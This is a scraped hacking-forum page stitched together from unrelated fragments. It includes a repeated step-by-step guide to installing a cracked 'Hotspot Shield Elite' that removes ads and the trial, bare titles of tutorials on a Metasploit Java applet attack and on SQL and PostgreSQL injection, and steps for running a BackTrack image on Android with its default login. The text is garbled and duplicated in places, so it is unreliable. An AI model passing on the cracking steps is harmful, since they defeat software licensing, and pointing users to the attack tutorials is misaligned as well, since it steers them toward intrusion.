Now open File1 folder and install setup given in it...while installing UN CHECK THE OPTION LAUNCH AFTER INSTALLATION & UNCHECK THE TOOLBAR INSTALLING OPTION...and restart your PC.6) After restarting without opening previous installed hotspot shield setup...install the setup given in File2 Folder.

This will upgrade the previous installtion & again as before unchecked the option for LAUNCH AFTER INSTALLATION & TOOLBAR.7) Now Restart Your PC Again.8) After Restarting...just double click or press connect now you are Using hotspot shield elite with no Ads/banner/Trial

Enjoy : D

Metasploit java applet attack on WAN (Internet) By Zahid Adeel

If video is not playing Here is the link:

Direct to youtube:

Click Here

sql injection (double query eror based) by Ment@l Mind

EXAMPLE OF SQL DOUBLE QUERY EROR BASED:

PostgreSQL injection by cep

Direct Download Link:

Hey Guys !
Its me Aitezaz Known as Soldier Of God (SOG)

* Install it, then open it when it's done, it will install some more things.
When it's done, install Linux Installer from Google Play:

* Just click on "Download Image", and let it finish downloading.
While it's downloading, open Google play and install Terminal Emulator, and Zarchiver.

Terminal Emulator:

* If it didn't recognize any distro, click on Setting > Edit then change the file path there to your backtrack image, the .img file that you extracted.
When it finally say "backtrack" on the drop down list, click "Start Linux"

Username: backtrack
Password: backtrac
IP: from the "ifconfig" command or just put 127.0.0.1
Color Format: 24-bit

Now open File1 folder and install setup given in it...while installing UN CHECK THE OPTION LAUNCH AFTER INSTALLATION & UNCHECK THE TOOLBAR INSTALLING OPTION...and restart your PC.

6) After restarting without opening previous installed hotspot shield setup...install the setup given in File2 Folder.

This will upgrade the previous installtion & again as before unchecked the option for LAUNCH AFTER INSTALLATION & TOOLBAR.

7) Now Restart Your PC Again.

8) After Restarting...just double click or press connect now you are Using hotspot shield elite with no Ads/banner/Trial